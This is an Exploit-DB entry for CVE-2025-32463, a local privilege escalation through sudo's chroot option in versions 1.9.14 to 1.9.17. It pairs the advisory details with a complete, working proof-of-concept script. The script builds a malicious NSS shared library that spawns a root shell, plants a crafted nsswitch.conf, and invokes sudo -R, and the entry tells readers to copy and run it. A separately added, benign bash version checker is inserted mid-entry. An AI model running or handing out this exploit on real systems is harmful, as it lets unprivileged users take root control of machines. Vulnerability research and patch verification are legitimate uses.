exploit-db-mirror/exploits/linux/local/52352.txt
Exploit-DB 1c08d6e575 DB: 2025-07-09
Exploit Title: Sudo chroot 1.9.17 - Local Privilege Escalation
Google Dork: not applicable
Date: Mon, 30 Jun 2025
Exploit Author: Stratascale
Vendor Homepage: https://salsa.debian.org/sudo-team/sudo
Software Link:
Version: Sudo versions 1.9.14 to 1.9.17 inclusive
Tested on: Kali Rolling 2025-7-3
CVE : CVE-2025-32463
*Version running today in Kali:*
https://pkg.kali.org/news/640802/sudo-1916p2-2-imported-into-kali-rolling/
*Background*
An attacker can leverage sudo's -R (--chroot) option to run
arbitrary commands as root, even if they are not listed in the
sudoers file.
Sudo versions affected:
Sudo versions 1.9.14 to 1.9.17 inclusive are affected.
CVE ID:
This vulnerability has been assigned CVE-2025-32463 in the
Common Vulnerabilities and Exposures database.
Details:
Sudo's -R (--chroot) option is intended to allow the user to
run a command with a user-selected root directory if the sudoers
file allows it. A change was made in sudo 1.9.14 to resolve
paths via chroot() using the user-specified root directory while
the sudoers file was still being evaluated. It is possible for
an attacker to trick sudo into loading an arbitrary shared
library by creating an /etc/nsswitch.conf file under the
user-specified root directory.
The change from sudo 1.9.14 has been reverted in sudo 1.9.17p1
and the chroot feature has been marked as deprecated. It will
be removed entirely in a future sudo release. Because of the
way sudo resolves commands, supporting a user-specified chroot
directory is error-prone and this feature does not appear to
be widely used.
A more detailed description of the bug and its effects can be
found in the Stratascale advisory:
https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot
Impact:
On systems that support /etc/nsswitch.conf a user may be able
to run arbitrary commands as root.
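Added defender-side check, not part of the Exploit-DB entry or the Stratascale advisory: a bash function that classifies a `sudo --version` banner against the affected range stated above (1.9.14 through 1.9.17, with 1.9.17p1 carrying the revert) and a host report that also notes whether /etc/nsswitch.conf exists, the precondition named under Impact. The function names and the output words ("affected", "not-affected", "unknown") are my own choices.

```bash
#!/bin/bash
# Added example (not from the advisory or the PoC): classify a sudo version
# banner against the CVE-2025-32463 affected range 1.9.14 .. 1.9.17.
# 1.9.17p1 reverted the chroot path-resolution change, so any p-level >= 1
# on 1.9.17 is treated as fixed.

sudo_chroot_status() {
    local ver maj min patch plevel
    # Pull the first version token, e.g. "1.9.16p2" out of "Sudo version 1.9.16p2".
    ver=$(printf '%s\n' "$1" | grep -oE '[0-9]+\.[0-9]+\.[0-9]+(p[0-9]+)?' | head -n 1)
    if [ -z "$ver" ]; then
        echo unknown
        return 0
    fi
    # Split "1.9.16p2" into "1 9 16 2"; a missing p-level defaults to 0.
    set -- $(printf '%s' "$ver" | tr '.p' '  ')
    maj=$1; min=$2; patch=$3; plevel=${4:-0}

    if [ "$maj" -eq 1 ] && [ "$min" -eq 9 ] && [ "$patch" -ge 14 ] && [ "$patch" -le 17 ]; then
        if [ "$patch" -eq 17 ] && [ "$plevel" -ge 1 ]; then
            echo not-affected   # 1.9.17p1 and later patch levels carry the revert
        else
            echo affected
        fi
    else
        echo not-affected       # older than 1.9.14 or newer than the 1.9.17 line
    fi
}

# Report on the running host: the sudo banner, its classification, and whether
# /etc/nsswitch.conf is present (the advisory's precondition for exploitation).
check_local_sudo() {
    local banner status nss
    banner=$(sudo --version 2>/dev/null | head -n 1) || banner=""
    status=$(sudo_chroot_status "$banner")
    if [ -e /etc/nsswitch.conf ]; then nss=present; else nss=absent; fi
    printf 'sudo: %s -> %s (nsswitch.conf %s)\n' "${banner:-not found}" "$status" "$nss"
}

# Only run the host report when sudo is installed; sourcing the file just defines the functions.
command -v sudo >/dev/null 2>&1 && check_local_sudo || true
```

Running the script on the Kali build mentioned above (1.9.16p2) reports "affected"; a host upgraded to 1.9.17p1 reports "not-affected". Treat "unknown" as a parsing failure (no version token in the banner), not as a clean result.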
*Exploit:*
*Verify the sudo version running: sudo --version. If it is vulnerable, copy and
paste the following code and run it.*
*----------------------*
#!/bin/bash
# sudo-chwoot.sh PoC CVE-2025-32463
set -e
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd "$STAGE"
# 1. NSS library
cat > woot1337.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor))
void woot(void) {
setreuid(0,0); /* change to UID 0 */
setregid(0,0); /* change to GID 0 */
chdir("/"); /* exit from chroot */
execl("/bin/bash","/bin/bash",NULL); /* root shell */
}
EOF
# 2. Mini chroot with toxic nsswitch.conf
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc # make getgrnam() not fail
# 3. compile libnss_
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "[*] Running exploit…"
sudo -R woot woot # (-R <dir> <cmd>)
# - the first "woot" is the chroot directory
# - the second "woot" is a nonexistent command
#   (sudo only needs to resolve the user)
rm -rf "$STAGE"
*----------------------*